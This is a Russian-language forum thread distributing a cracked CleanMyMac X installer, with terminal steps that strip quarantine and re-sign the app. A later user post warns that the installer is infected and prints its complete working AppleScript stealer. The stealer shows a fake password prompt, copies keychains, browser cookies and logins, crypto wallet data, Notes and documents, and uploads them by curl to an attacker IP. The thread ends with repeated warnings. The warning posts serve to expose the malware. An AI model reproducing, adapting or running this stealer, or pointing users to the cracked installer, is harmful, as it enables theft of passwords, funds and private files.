CleanMyMac X Год выпуска: 2025 Версия: 5.0.5 Разработчик: MacPaw Сайт разработчика: https://macpaw.com/ Платформа: Intel/Apple Silicon Universal Язык интерфейса: английский Таблетка: Программа пролечена (не требует введения данных/вводим любые данные) Системные требования: macOS 11 или выше Описание: CleanMyMac X — это комплексный пакет для улучшения вашего Mac. Он очищает мегатонны мусора и заставляет ваш компьютер работать быстрее. CleanMyMac X ищет мусор во всех уголках вашей macOS. Он очищает ненужные файлы, такие как устаревшие кэши, сломанные загрузки, журналы и бесполезные локализации. Вы можете удалить тонны мусора и найти гигабайты больших скрытых файлов. Инструменты очистки Mac в CleanMyMac X сократят лишний вес за считанные секунды. Доп. информация:
What's new:
The new Maintenance Task deals with Purgeable space — data that is safe to remove when more storage is needed. It commonly includes cached, temporary, and files that can be redownloaded or recreated.
When CleanMyMac frees up purgeable space, it doesn't impact essential files or applications.
Установка
:
1. Установите программу.
2. Введите команды в терминал: xattr -cr /Applications/CleanMyMac_5.app codesign --force --deep --sign - /Applications/CleanMyMac_5.app
Все работает, спасибо за раздачу. Комманда активации у вас не работает потому, что программа устанавливается не в программы, а например в папку Приложения Хром, как было у меня. Чекайте этот момент.
Все работает!!! пароль от мака сначала , потом разрешить установку из недостоверных источников, затем уже установка дальше и терминал. СПАСИБО
stepannikulin59 писал(а):
87407251Все работает, спасибо за раздачу. Комманда активации у вас не работает потому, что программа устанавливается не в программы, а например в папку Приложения Хром, как было у меня. Чекайте этот момент.
ОСТОРОЖНО файл заражен стиллером стучит на set result_send to (do shell script "curl -X POST -H \"buildid: 1\" -H \"username: wooble\" --data-binary @/tmp/out.zip http://185.147.124.212/log")
pkgutil --expand CleanMyMac.pkg /Users/тут имя/Desktop/pkg/1
далее открываем текстовым редактором preinstall
#Poseidon #stealer for #macos with low detections lol "poseidon[.]cool" domain points to its C2 saves zip in /tmp/pizda/😩 C2: 185.147.124.212
MD5:cf2647a0236766a5db94dfecfe87fbb9
скрытый текст
osascript -e 'set release to true
set filegrabbers to true
on mkdir(someItem)
try
set filePosixPath to quoted form of (POSIX path of someItem)
do shell script "mkdir -p " & filePosixPath
end try
end mkdir
on FileName(filePath)
try
set reversedPath to (reverse of every character of filePath) as string
set trimmedPath to text 1 thru ((offset of "/" in reversedPath) - 1) of reversedPath
set finalPath to (reverse of every character of trimmedPath) as string
return finalPath
end try
end FileName
on BeforeFileName(filePath)
try
set lastSlash to offset of "/" in (reverse of every character of filePath) as string
set trimmedPath to text 1 thru -(lastSlash + 1) of filePath
return trimmedPath
end try
end BeforeFileName
on writeText(textToWrite, filePath)
try
set folderPath to BeforeFileName(filePath)
mkdir(folderPath)
set fileRef to (open for access filePath with write permission)
write textToWrite to fileRef starting at eof
close access fileRef
end try
end writeText
on readwrite(path_to_file, path_as_save)
try
set fileContent to read path_to_file
set folderPath to BeforeFileName(path_as_save)
mkdir(folderPath)
do shell script "cat " & quoted form of path_to_file & " > " & quoted form of path_as_save
end try
end readwrite
on isDirectory(someItem)
try
set filePosixPath to quoted form of (POSIX path of someItem)
set fileType to (do shell script "file -b " & filePosixPath)
if fileType ends with "directory" then
return true
end if
return false
end try
end isDirectory
on GrabFolder(sourceFolder, destinationFolder)
try
set exceptionsList to {".DS_Store", "Partitions", "Code Cache", "Cache", "market-history-cache.json", "journals", "Previews"}
set fileList to list folder sourceFolder without invisibles
mkdir(destinationFolder)
repeat with currentItem in fileList
if currentItem is not in exceptionsList then
set itemPath to sourceFolder & "/" & currentItem
set savePath to destinationFolder & "/" & currentItem
if isDirectory(itemPath) then
GrabFolder(itemPath, savePath)
else
readwrite(itemPath, savePath)
end if
end if
end repeat
end try
end GrabFolder
on GetUUID(pather, searchString)
try
set theFile to POSIX file pather
set fileContents to read theFile
set startPos to offset of searchString in fileContents
if startPos is 0 then
return "not found"
end if
set uuidStart to startPos + (length of searchString)
set uuid to text uuidStart thru (uuidStart + 55) of fileContents
set endpos to offset of "\\" in uuid
if endpos is 0 then
return "not found"
end if
set realuuid to text uuidStart thru (uuidStart + endpos - 2) of fileContents
return realuuid
on error
return "not found"
end try
end GetUUID
on firewallets(firepath, savepath)
try
set fire_wallets to {{"MetaMask", "webextension@metamask.io\\\":\\\""}}
repeat with wallet in fire_wallets
set uuid to GetUUID(firepath & "/prefs.js", item 2 of wallet)
if uuid is not "not found" then
set walkpath to firepath & "/storage/default/"
set fileList to list folder walkpath without invisibles
repeat with currentItem in fileList
if (currentItem contains uuid) and (currentItem contains "userContext") then
set fwallet to walkpath & currentItem & "/idb/"
set fileList_wallet to list folder fwallet without invisibles
repeat with currentItem_wallet in fileList_wallet
if isDirectory(fwallet & currentItem_wallet) then
GrabFolder(fwallet & currentItem_wallet, savepath & "/" &item 1 of wallet & "/")
end if
end repeat
end if
end repeat
end if
end repeat
end try
end firewallets
on parseFF(browsername, firefox, writemind)
try
set myFiles to {"/cookies.sqlite", "/formhistory.sqlite", "/key4.db", "/logins.json"}
set fileList to list folder firefox without invisibles
repeat with currentItem in fileList
set fpath to writemind & "gecko/" & browsername & "_" & currentItem
firewallets(firefox & currentItem, fpath)
set readpath to firefox & currentItem
repeat with FFile in myFiles
readwrite(readpath & FFile, fpath & FFile)
end repeat
end repeat
end try
end parseFF
on checkvalid(username, password_entered)
try
set result to do shell script "dscl . authonly " & quoted form of username & space & quoted form of password_entered
if result is not equal to "" then
return false
else
return true
end if
on error
return false
end try
end checkvalid
on getpwd(username, writemind)
try
if checkvalid(username, "") then
set result to do shell script "security 2>&1 > /dev/null find-generic-password -ga \"Chrome\" | awk \"{print $2}\""
writeText(result as string, writemind & "masterpass-chrome")
else
repeat
set result to display dialog "Required Application Helper. Please enter password for continue." default answer "" with icon caution buttons {"Continue"} default button "Continue" giving up after 150 with title "Application wants to install helper" with hidden answer
set password_entered to text returned of result
if checkvalid(username, password_entered) then
writeText(password_entered, writemind & "pwd")
return password_entered
end if
end repeat
end if
end try
return ""
end getpwd
on grabPlugins(paths, savePath, pluginList, index)
try
set fileList to list folder paths without invisibles
repeat with PFile in fileList
repeat with Plugin in pluginList
if (PFile contains Plugin) then
set newpath to paths & PFile
set newsavepath to savePath & "/" & Plugin
if index then
set newsavepath to newsavepath & "/IndexedDB/"
end if
GrabFolder(newpath, newsavepath)
end if
end repeat
end repeat
end try
end grabPlugins
on chromium(writemind, chromium_map)
set pluginList to {"ldinpeekobnhjjdofggfgjlcehhmanlj","nphplpgoakhhjchkkhmiggakijnkhfnd","jbkgjmpfammbgejcpedggoefddacbdia","fccgmnglbhajioalokbcidhcaikhlcpm","nebnhfamliijlghikdgcigoebonmoibm","fdcnegogpncmfejlfnffnofpngdiejii","mfhbebgoclkghebffdldpobeajmbecfk","ffbceckpkpbcmgiaehlloocglmijnpmp","kfdniefadaanbjodldohaedphafoffoh","bedogdpgdnifilpgeianmmdabklhfkcn","kpfchfdkjhcoekhdldggegebfakaaiog","klnaejjgbibmhlephnhpmaofohgkpgkd","opcgpfmipidbgpenhmajoajpbobppdil","mmmjbcfofconkannjonfmjjajpllddbg","modjfdjcodmehnpccdjngmdfajggaoeh","dkdedlpgdmmkkfjabffeganieamfklkm","ifclboecfhkjbpmhgehodcjpciihhmif","ppbibelpcjmhbdihakflkdcoccbgbkpo","ejjladinnckdgjemekebdpeokbikhfci","kkpllkodjeloidieedojogacfhpaihoh","apnehcjmnengpnmccpaibjmhhoadaico","jiepnaheligkibgcjgjepjfppgbcghmp","jojhfeoedkpkglbfimdfabpdfjaoolaf","idpdilbfamoopcfofbipefhmmnflljfi","lbjapbcmmceacocpimbpbidpgmlmoaao","oiohdnannmknmdlddkdejbmplhbdcbee","fldfpgipfncgndfolcbkdeeknbbbnhcc","fpkhgmpbidmiogeglndfbkegfdlnajnf","lgmpcpglpngdoalbgeoldeajfclnhafa","ilhaljfiglknggcoegeknjghdgampffk","pfccjkejcgoppjnllalolplgogenfojk","cnmamaachppnkjgnildpdmkaakejnhae","eajafomhmkipbjmfmhebemolkcicgfmd","emeeapjkbcbpbpgaagfchmcgglmebnen","ibnejdfjmmkpcnlpebklmnkoeoihofec","hifafgmccdpekplomjjkcfgodnhcellj","ffnbelfdoeiohenkjibnmadjiehjhajb","fnjhmkhhmkbjkkabndcnnogagogbneec","bcopgchhojmggmffilplmbdicgaihlkp","cmoakldedjfnjofgbbfenefcagmedlga","ifckdpamphokdglkkdomedpdegcjhjdp","ibljocddagjghmlpgihahamcghfggcjc","cjmkndjhnagcfbpiemnkdpomccnjblmj","kbdcddcmgoplfockflacnnefaehaiocb","cgeeodpfagjceefieflmdfphplkenlfk","afbcbjpbpfadlkmhmclhkeeodmamcflc","fdchdcpieegfofnofhgdombfckhbcokj","gjlmehlldlphhljhpnlddaodbjjcchai","ellkdbaphhldpeajbepobaecooaoafpg","ojbcfhjmpigfobfclfflafhblgemeidi","ghlmndacnhlaekppcllcpcjjjomjkjpg","kgdijkcfiglijhaglibaidbipiejjfdp","abkahkcbhngaebpcgfmhkoioedceoigp","ammjlinfekkoockogfhdkgcohjlbhmff","pdliaogehgdbhbnmkklieghmmjkpigpa","jnlgamecbpmbajjfhmmmlhejkemejdma","nbdhibgjnjpnkajaghbffjbkcgljfgdi","jfdlamikmbghhapbgfoogdffldioobgl","fijngjgcjhjmmpcmkeiomlglpeiijkld","hgbeiipamcgbdjhfflifkgehomnmglgk","pmmnimefaichbcnbndcfpaagbepnjaig","cflgahhmjlmnjbikhakapcfkpbcmllam","keenhcnmdmjjhincpilijphpiohdppno","bipdhagncpgaccgdbddmbpcabgjikfkn","bcenedbpaaegpnijoadpdjiachahncdg","pocmplpaccanhmnllbbkpgfliimjljgo","klghhnkeealcohjjanjjdaeeggmfmlpl","cjookpbkjnpkmknedggeecikaponcalb","ojggmchlghnjlapmfbnjholfjkiidbch","dngmlblcodfobpdpecaadgfbcggfjfnm","jnldfbidonfeldmalbflbmlebbipcnle","ehjiblpccbknkgimiflboggcffmpphhp","agoakfejjabomempkjlepdflaleeobhb","fopmedgnkfpebgllppeddmmochcookhc","dmkamcknogkgcdfhhbddcghachkejeap","iglbgmakmggfkoidiagnhknlndljlolb","opfgelmcmbiajamepnmloijbpoleiama","gkeelndblnomfmjnophbhfhcjbcnemka","dgiehkgfknklegdhekgeabnhgfjhbajd","gafhhkghbfjjkeiendhlofajokpaflmk","imlcamfeniaidioeflifonfjeeppblda","penjlddjkjgpnkllboccdgccekpkcbin","nhnkbkgjikgcigadomkphalanndcapjk","egjidjbpglichdcondbcbdnbeeppgdph","dlcobpjiigpikoobohmabehhmhfoodbb","dldjpboieedgcmpkchcjcbijingjcgok","acmacodkjbdgmoleebolmdjonilkdbch","lccbohhgfkdikahanoclbdmaolidjdfl","pcndjhkinnkaohffealmlmhaepkpmgkb","gjagmgiddbbciopjhllkdnddhcglnemk","cnncmdhjacpkmjmkcafchppbnpnhdmon","mfgccjchihfkkindfppnaooecgfneiii","ieldiilncjhfkalnemgjbffmpomcaigi","ckklhkaabbmdjkahiaaplikpdddkenic","loinekcabhlmhjjbocijdoimmejangoa","mgffkfbidihjpoaomajlbgchddlicgpn","pnndplcbkakcplkjnolgbkdgjikjednm","mcohilncbfahbmgdjkbpemcciiolgcge","bgpipimickeadkjlklgciifhnalhdjhe","pdadjkfkgcafgbceimcpbkalnfnepbnk","jiidiaalihmmhddjgbnbgdfflelocpak","aeachknmefphepccionboohckonoeemg","gdokollfhmnbfckbobkdbakhilldkhcj","jiiigigdinhhgjflhljdkcelcjfmplnd","kmphdnilpmdejikjdnlbcnmnabepfgkh","jaooiolkmfcmloonphpiiogkfckgciom","fcckkdbjnoikooededlapcalpionmalo","mdnaglckomeedfbogeajfajofmfgpoae","ebfidpplhabeedpnhjnobghokpiioolj","dbgnhckhnppddckangcjbkjnlddbjkna","cpmkedoipcpimgecpmgpldfpohjplkpp","epapihdplajcdnnkdeiahlgigofloibg","iokeahhehimjnekafflcihljlcjccdbe","cihmoadaighcejopammfbmddcmdekcje","hnfanknocfeofbddgcijnmhnfnkdnaad","kilnpioakcdndlodeeceffgjdpojajlo","abogmiocnneedmmepnohnhlijcjpcifd","bofddndhbegljegmpmnlbhcejofmjgbn","aholpfdialjgjfhomihkjbmgjidlcdno","hdkobeeifhdplocklknbnejdelgagbao","oafedfoadhdjjcipmcbecikgokpaphjk","bfnaelmomeimhlpmgjnjophhpkkoljpa","nkbihfbeogaeaoehlefnkodbefgpgknn","lfmmjkfllhmfmkcobchabopkcefjkoip","aiifbnbfobpmeekipheeijimdpnlpgpp","anokgmphncpekkhclmingpimjmcooifb","mnfifefkajgofkcjkemidiaecocnkjeh","momakdpclmaphlamgjcndbgfckjfpemp","akkmagafhjjjjclaejjomkeccmjhdkpa","ehgjhhccekdedpbkifaojjaefeohnoea","mkpegjkblkkefacfnmkajcjmabijhclg","mlhakagmgkmonhdonhkpjeebfphligng","niiaamnmgebpeejeemoifgdndgeaekhe","jnmbobjmhlngoefaiojfljckilhhlhcj","onhogfjeacnfoofkfgppdlbmlmnplgbn","kppfdiipphfccemcignhifpjkapfbihd","hcjhpkgbmechpabifbggldplacolbkoh","flpiciilemghbmfalicajoolhkkenfel","mlbnicldlpdimbjdcncnklfempedeipj","cfbfdhimifdmdehjmkdobpcjfefblkjm","ocjobpilfplciaddcbafabcegbilnbnb","pgiaagfkgcbnmiiolekcfmljdagdhlcm","enabgbdfcbaehmbigakijjabdpdnimlg","bifidjkcdpgfnlbcjpdkdcnbiooooblg","lnnnmfcpbkafcpgdilckhmhbkkbpkmid","nlgbhdfgdhgbiamfdfmbikcdghidoadd","fcfcfllfndlomdhbehjjcoimbgofdncg","lpilbniiabackdjcionkobglmddfbcjo","efbglgofoippbgcjepnhiblaibcnclgk","fhbohimaelbohpjbbldcngcnapndodjp","gkodhkbmiflnmkipcmlhhgadebbeijhh","bocpokimicclpaiekenaeelehdjllofo","bhhhlbepdkbapadjdnnojkbgioiodbic","aflkmfhebedbjioipglgcbcmnbpgliof","mkchoaaiifodcflmbaphdgeidocajadp","mapbhaebnddapnmifbbkgeedkeplgjmf","lmkncnlpeipongihbffpljgehamdebgi","gjnckgkfmgmibbkoficdidcljeaaaheg","ppdadbejkmjnefldpcdjhnkpbjkikoip","bopcbmipnjdcdfflfgjdgdjejmgpoaab","kamfleanhcmjelnhaeljonilnmjpkcjc","cphhlgmgameodnhkjdmkpanlelnlohao","hnhobjmcibchnmglfbldbfabcgaknlkj","nknhiehlklippafakaeklbeglecifhad","kjjebdkfeagdoogagbhepmbimaphnfln","phkbamefinggmakgklpkljjmgibohnba","lakggbcodlaclcbbbepmkpdhbcomcgkd","ookjlbkiijinhpmnjffcofjonbfbgaoc","mdjmfdffdcmnoblignmgpommbefadffd","jblndlipeogpafnldhgmapagcccfchpi","hbbgbephgojikajhfbomhlmmollphcad","dpcklmdombjcplafheapiblogdlgjjlb","hmeobnfnfcmdkdcmlblgagmfpfboieaf","kmhcihpebfmpgmihbkipmjlmmioameka","kennjipeijpeengjlogfdjkiiadhbmjl","amkmjjmmflddogmhpjloimipbofnfjih","idnnbdplmphpflfnlkomgpfbpcgelopg","fmblappgoiilbgafhjklehhfifbdocee","heamnjbnflcikcggoiplibfommfbkjpj","khpkpbbcccdmmclmpigdgddabeilkdpd","omaabbefbmiijedngplfjmnooppbclkk","nhlnehondigmgckngjomcpcefcdplmgc","fiikommddbeccaoicoejoniammnalkfa","ejbidfepgijlcgahbmbckmnaljagjoll","glmhbknppefdmpemdmjnjlinpbclokhn","kncchdigobghenbbaddojjnnaogfppfj","hpclkefagolihohboafpheddmmgdffjm","ilolmnhjbbggkmopnemiphomhaojndmb","panpgppehdchfphcigocleabcmcgfoca"}
set chromiumFiles to {"/Network/Cookies", "/Cookies", "/Web Data", "/Login Data", "/Local Extension Settings/", "/IndexedDB/"}
repeat with chromium in chromium_map
set savePath to writemind & "chromium/" & item 1 of chromium & "_"
try
set fileList to list folder item 2 of chromium without invisibles
repeat with currentItem in fileList
if ((currentItem as string) is equal to "Default") or ((currentItem as string) contains "Profile") then
repeat with CFile in chromiumFiles
set readpath to (item 2 of chromium & currentItem & CFile)
if ((CFile as string) is equal to "/Network/Cookies") then
set CFile to "/Cookies"
end if
if ((CFile as string) is equal to "/Local Extension Settings/") then
grabPlugins(readpath, savePath & currentItem, pluginList, false)
else if (CFile as string) is equal to "/IndexedDB/" then
grabPlugins(readpath, savePath & currentItem, pluginList, true)
else
set writepath to savePath & currentItem & CFile
readwrite(readpath, writepath)
end if
end repeat
end if
end repeat
end try
end repeat
end chromium
on deskwallets(writemind, deskwals)
repeat with deskwal in deskwals
try
GrabFolder(item 2 of deskwal, writemind & item 1 of deskwal)
end try
end repeat
end deskwallets
on filegrabber()
set destFolder to "/tmp/pizda/finder/"
set destinationFolderPath to POSIX file destFolder
set notesMedia to POSIX file (destFolder & "NotesMedia/")
set extensionsList to {"txt", "pdf", "docx", "wallet", "key", "keys", "doc", "jpeg", "png", "kdbx"}
set bankSize to 0
set uuidString to do shell script "system_profiler SPHardwareDataType | awk \"/UUID/ { print $3 }\""
mkdir(destinationFolderPath)
mkdir(notesMedia)
tell application "Finder"
try
set safariFolderPath to (path to home folder as text) & "Library:Cookies:"
duplicate file (safariFolderPath & "Cookies.binarycookies") to folder destinationFolderPath with replacing
set name of result to "saf1"
end try
set safariFolder to ((path to library folder from user domain as text) & "Containers:com.apple.Safari:Data:Library:Cookies:")
try
duplicate file "Cookies.binarycookies" of folder safariFolder to folder destinationFolderPath with replacing
end try
set notesFolderPath to (path to home folder as text) & "Library:Group Containers:group.com.apple.notes:"
try
set notesFolder to folder notesFolderPath
set notesFiles to {"NoteStore.sqlite", "NoteStore.sqlite-shm", "NoteStore.sqlite-wal"}
repeat with aFile in notesFiles
try
duplicate (file aFile of notesFolder) to folder destinationFolderPath with replacing
end try
end repeat
end try
set notesAccountsPath to (notesFolderPath & "Accounts:")
try
set notesAccountsFolder to folder notesAccountsPath
set notesAccountsFiles to every folder of notesAccountsFolder
repeat with nFile in notesAccountsFiles
set notesMediaPath to notesAccountsPath & name of nFile & ":Media:"
set notesMediaProfiles to every folder of (folder notesMediaPath)
repeat with profileFolder in notesMediaProfiles
set notesMediaProfilesPath to notesMediaPath & name of profileFolder
set notesMediaProfileFiles to every folder of (folder notesMediaProfilesPath)
repeat with notesUUID in notesMediaProfileFiles
duplicate notesUUID to notesMedia with replacing
end repeat
end repeat
end repeat
end try
try
set safariFolderPath to (path to library folder from user domain as text) & "Safari:"
duplicate (file "Form Values" of folder safariFolderPath) to destinationFolderPath with replacing
end try
try
set keychainFolder to (path to library folder from user domain as text) & "Keychains:" & uuidString
duplicate folder keychainFolder to destinationFolderPath with replacing
end try
try
set desktopFiles to every file of desktop
set documentsFiles to every file of folder "Documents" of (path to home folder)
set downloadsFiles to every file of folder "Downloads" of (path to home folder)
repeat with aFile in (desktopFiles & documentsFiles & downloadsFiles)
set fileExtension to name extension of aFile
if fileExtension is in extensionsList then
set filesize to size of aFile
if (bankSize + filesize) < 10 * 1024 * 1024 then
try
duplicate aFile to folder destinationFolderPath with replacing
set bankSize to bankSize + filesize
end try
else
exit repeat
end if
end if
end repeat
end try
end tell
end filegrabber
on send_data(attempt)
try
set result_send to (do shell script "curl -X POST -H \"buildid: 1\" -H \"username: wooble\" --data-binary @/tmp/out.zip http://185.147.124.212/log")
on error
if attempt < 10 then
delay 60
send_data(attempt + 1)
end if
end try
end send_data
set username to (system attribute "USER")
set profile to "/Users/" & username
set writemind to "/tmp/pizda/"
try
set result to (do shell script "system_profiler SPSoftwareDataType SPHardwareDataType SPDisplaysDataType")
writeText(result, writemind & "hardware")
end try
set library to profile & "/Library/Application Support/"
set password_entered to getpwd(username, writemind)
delay 0.01
set chromiumMap to {{"Chrome", library & "Google/Chrome/"}, {"Brave", library & "BraveSoftware/Brave-Browser/"}, {"Edge", library & "Microsoft Edge/"}, {"Vivaldi", library & "Vivaldi/"}, {"Opera", library & "com.operasoftware.Opera/"}, {"OperaGX", library & "com.operasoftware.OperaGX/"}, {"Chrome Beta", library & "Google/Chrome Beta/"}, {"Chrome Canary", library & "Google/Chrome Canary"}, {"Chromium", library & "Chromium/"}, {"Chrome Dev", library & "Google/Chrome Dev/"}}
set walletMap to {{"deskwallets/Electrum", profile & "/.electrum/wallets/"}, {"deskwallets/Coinomi", library & "Coinomi/wallets/"}, {"deskwallets/Exodus", library & "Exodus/"}, {"deskwallets/Atomic", library & "atomic/Local Storage/leveldb/"}, {"deskwallets/Wasabi", profile & "/.walletwasabi/client/Wallets/"}, {"deskwallets/Ledger_Live", library & "Ledger Live/"}, {"deskwallets/Monero", profile & "/Monero/wallets/"}, {"deskwallets/Bitcoin_Core", library & "Bitcoin/wallets/"}, {"deskwallets/Litecoin_Core", library & "Litecoin/wallets/"}, {"deskwallets/Dash_Core", library & "DashCore/wallets/"}, {"deskwallets/Electrum_LTC", profile & "/.electrum-ltc/wallets/"}, {"deskwallets/Electron_Cash", profile & "/.electron-cash/wallets/"}, {"deskwallets/Guarda", library & "Guarda/"}, {"deskwallets/Dogecoin_Core", library & "Dogecoin/wallets/"}, {"deskwallets/Trezor_Suite", library & "@trezor/suite-desktop/"}}
readwrite(library & "Binance/app-store.json", writemind & "deskwallets/Binance/app-store.json")
readwrite(library & "@tonkeeper/desktop/config.json", "deskwallets/TonKeeper/config.json")
readwrite(profile & "/Library/Keychains/login.keychain-db", writemind & "kc")
if release then
readwrite(profile & "/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite", writemind & "FileGrabber/NoteStore.sqlite")
readwrite(profile & "/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite-wal", writemind & "FileGrabber/NoteStore.sqlite-wal")
readwrite(profile & "/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite-shm", writemind & "FileGrabber/NoteStore.sqlite-shm")
readwrite(profile & "/Library/Containers/com.apple.Safari/Data/Library/Cookies/Cookies.binarycookies", writemind & "FileGrabber/Cookies.binarycookies")
readwrite(profile & "/Library/Cookies/Cookies.binarycookies", writemind & "FileGrabber/saf1")
end if
if filegrabbers then
filegrabber()
end if
writeText(username, writemind & "user")
set ff_paths to {{"Firefox", library & "Firefox/Profiles/"}, {"Waterfox", library & "Waterfox/Profiles/"}}
repeat with gecko in ff_paths
try
parseFF(item 1 of gecko, item 2 of gecko, writemind)
end try
end repeat
chromium(writemind, chromiumMap)
deskwallets(writemind, walletMap)
do shell script "ditto -c -k --sequesterRsrc " & writemind & " /tmp/out.zip"
send_data(0)
do shell script "rm -r " & writemind
do shell script "rm /tmp/out.zip"'
Do not use this installer from here because it is infected with a stealer that captures all wallets, browser cookies, passwords, text files, and images below a certain size. Check my post above for a full analysis of the installer and exactly what it steals. If you have already run the installer from here, change all possible passwords immediately, as your computer has been compromised, and your data has been sent to an attacker’s server. If I were the administrators, I would shut down this section entirely, as people are getting infected here almost every day. https://www.broadcom.com/support/security-center/protection-bulletin/poseidon-inf...-targeting-macos
Do not use this installer from here because it is infected with a stealer that captures all wallets, browser cookies, passwords, text files, and images below a certain size. Check my post above for a full analysis of the installer and exactly what it steals. If you have already run the installer from here, change all possible passwords immediately, as your computer has been compromised, and your data has been sent to an attacker’s server. If I were the administrators, I would shut down this section entirely, as people are getting infected here almost every day. https://www.broadcom.com/support/security-center/protection-bulletin/poseidon-inf...-targeting-macos
